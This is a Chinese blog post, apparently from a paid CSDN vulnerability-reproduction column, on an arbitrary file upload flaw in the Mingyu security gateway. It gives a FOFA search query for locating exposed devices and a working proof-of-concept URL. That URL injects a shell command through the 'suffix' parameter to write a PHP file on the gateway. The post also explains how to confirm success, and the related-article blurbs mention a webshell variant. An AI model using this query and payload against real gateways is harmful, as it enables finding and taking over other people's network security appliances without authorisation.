明御安全网关任意文件上传漏洞复现

最新推荐文章于 2024-06-20 18:31:22 发布
最新推荐文章于 2024-06-20 18:31:22 发布
阅读量364 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1593572468/article/details/134255405
版权
漏洞复现 专栏收录该内容
36 篇文章 8 订阅 ¥9.90 ¥99.00
订阅专栏

简介

安恒信息明御安全网关(NGFW) 秉持安全可视、简单有效的理念,以资产为视角的全流程防御的下一代安全防护体系,并融合传统防火墙、入侵防御系统、防病毒网关、上网行为管控、VPN网关、威胁情报等安全模块于一体的智慧化安全网关。

较低版本的系统存在任意文件上传漏洞,可导致直接getshell。

漏洞复现

FOFA语法:

title="明御安全网关"

访问页面如下:

POC:

/webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1%7Cecho+%22test123%22+%3E+.test.php

拼接URL尝试访问

若返回响应信息中存在 success 字符,代表文件已经上传成功 

访问拼接上传的文件路径url:

https://IP:PORT/webui/.test.php

了解本专栏 订阅专栏 解锁全文
Cheng-Ling
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
安恒明御安全网 aaa_local_web_preview文件漏洞
0xSec
12-15 1074
明御安全网在aaa_local_web_preview文件处存在文件漏洞,攻击者可以利用该漏洞恶意文件进而进行敏感操作获取服务器权限。
SexyBeast233#SecBooks#HIKVISION 视频编码设备接入网 任意文件下载1
07-25
HIKVISION 视频编码设备接入网 任意文件下载漏洞描述海康威视视频接入网系统在页面/serverLog/downFile.php的参数fileName
安恒明御安全网aaa_local_web_preview 任意文件漏洞
The current road is different, love needs to distinguish between right and wrong
12-18 563
安恒明御安全网是一个网络安全产品,由安恒信息技术股份有限公司开发和提供。它是一个综合性的安全管理平台,用于保护企业网络免受各种网络威胁的攻击。该产品aaa_local_web_preview端点存在文件漏洞。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
明御运维审计与风险控制系统漏洞_明御堡垒机漏洞
uiuuyy67的博客
04-12 376
为了做好运维面试路上的助攻手,特整理了上百道。
漏洞】某厂商明御安全网sslvpn命令执行漏洞
晚风不及你
03-02 899
明御安全网是杭州安恒信息技术股份有限公司研发的一款智慧化安全网产品。这款产品秉持安全可视、简单有效的理念,以资产为视角,构建了全流程防御的下一代安全防护体系。
漏洞--安恒明御安全网文件
qq_53003652的博客
10-17 443
安恒明御安全网是一个网络安全产品,由安恒信息技术股份有限公司开发和提供。它是一个综合性的安全管理平台,用于保护企业网络免受各种网络威胁的攻击。该产品存在文件漏洞。如此页面便存在该漏洞。该POC已将一句话木马写入,名称为.xxx.php,路径在/webui/.xxx.php。脚本来自揽月安全团队。
网御运维安全网V3.0-运维人员使用手册-v1.0-20190322更新.docx
04-17
网御运维安全网V3.0-运维人员使用手册-v1.0-20190322更新.docx 网御运维安全网V3.0-运维人员使用手册-v1.0-20190322更新.docx 网御运维安全网V3.0-运维人员使用手册-v1.0-20190322更新.docx 网御运维安全网V...
Leadsec网御安全网
01-26
Leadsec网御安全网Smart_V1.2_Web界面在线手册.pdf )
网御运维安全网V3.0-产品FAQ手册-v1.0-20191223更新.doc
04-17
网御运维安全网V3.0-产品FAQ手册-v1.0-20191223更新.doc网御运维安全网V3.0-产品FAQ手册-v1.0-20191223更新.doc网御运维安全网V3.0-产品FAQ手册-v1.0-20191223更新.doc网御运维安全网V3.0-产品FAQ手册-v1.0-...
VirtualBox 7.0.18 安装在D盘文件下,会提示目录不安全等信息,不让安装
qq_43684686的博客
06-17 339
VirtualBox 7.0.18 安装在D盘文件下,会提示目录不安全等信息,不让安装。重新执行安装程安装到 d:\a-vm。在D盘新建一个文件夹a-vm,
如何确保数据跨域交换安全、合规、可追溯性?
文件数据安全交换
06-14 589
飞驰云联是中国领先的数据安全输解决方案提供商,长期专注于安全可控、性能卓越的数据输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全输、数据输过程的防泄漏、FTP的增强和国产化替代、文件输自动化和输集成等各种数据输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地输。问题:明文输,容易被截获和窃取;
【启明智显产品分享】Model3工业级HMI芯片详解系列专题(三):安全、稳定、高防护
ami82的博客
06-20 375
Model3芯片具备高达8KV的ESD HBM防护,在恶劣的工业环境中能够抵抗各种电磁干扰,提升系统可靠性;Model3芯片支持高精度电子脉宽调制(EPWM)控制,能够满足杂电机控制和精细过程控制的需要,在控制应用中更加精准;Model3芯片内置4线电阻触摸屏驱动,为用户提供便捷的交互途径,降低了外围BOM成本。
企业防盗版,如何保障上网安全
最新发布
shenxinda_lu的博客
06-20 159
当需要访问互联网时,用户在隔离沙盒内进行操作,确保主机与互联网物理隔离,只有沙盒能够访问互联网,且沙盒与本机隔离。
Java中的安全管理器和权限控制
weixin_53840353的博客
06-13 689
Java安全管理器是一种允许应用程序在运行时检查对系统资源(如文件和网络)的访问权限的机制。通过定义和安装自定义的安全策略,程序员可以控制哪些代码能够执行特定的操作,从而保护系统资源的安全。@Override// 自定义安全策略throw new SecurityException("写文件操作被禁止!");try {// 尝试写文件操作System.err.println("安全异常:" + e.getMessage());在这个示例中,自定义的禁止所有文件写操作。
如何隐藏真实的MAC地址和IP地址,保证多账户的安全?
vmlogin888的博客
06-18 450
在计算机网络中,MAC地址(Media Access Control Address)和IP地址(Internet Protocol Address)是两个重要的概念,用于网络设备之间的通信。虽然它们都用于标识设备,但在运作原理和作用上有着明显的区别。
HSE在企业中的重要性:健康、安全与环境的全面保障
shuntian88的博客
06-18 437
通过健康风险评估、安全培训、风险管理和环境保护措施,企业不仅保障员工的健康和安全,还推动环境的可持续发展。定期监测员工的健康状况,及时发和处理与工作环境相的健康问题,预防职业病,确保员工保持良好的身体状态,提高工作效率和满意度。系统化的风险评估和管理,预防健康、安全和环境风险,减少事故和职业病的发生,保障员工和环境的安全。通过有效的HSE管理,企业在员工、社会和环境之间实良好平衡,促进各方利益的共同发展。健康安全的工作环境和高效的资源管理,提升员工工作效率,优化企业运营流程。HSE管理的综合效益。
网络与协议安全习 - 电子邮件安全
infinity_heaven的博客
06-13 731
PGP、S/MIME、DKIM
餐饮食堂安全守护者:可燃气体报警器故障处理与检测要点解析
BDjiance的博客
06-17 386
在餐饮食堂中,可燃气体报警器的正常运行对于预防火灾和保障人员安全至重要。接下来,佰德将围绕可燃气体报警器的故障象识别、原因排查、安全操作准则、专业工具与备件、故障处理步骤、验证与测试以及维护与保养建议等方面进行详细阐述,帮助相人员更好地应对可燃气体报警器故障。
安恒明御安全网文件
09-01
根据提供的引用资料,安恒明御安全网中存在文件漏洞。具体来说,该漏洞允许攻击者通过执行命令上恶意文件到安恒明御安全网上。由于没有给出具体的文件漏洞的细节,我无法提供更多的信息。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值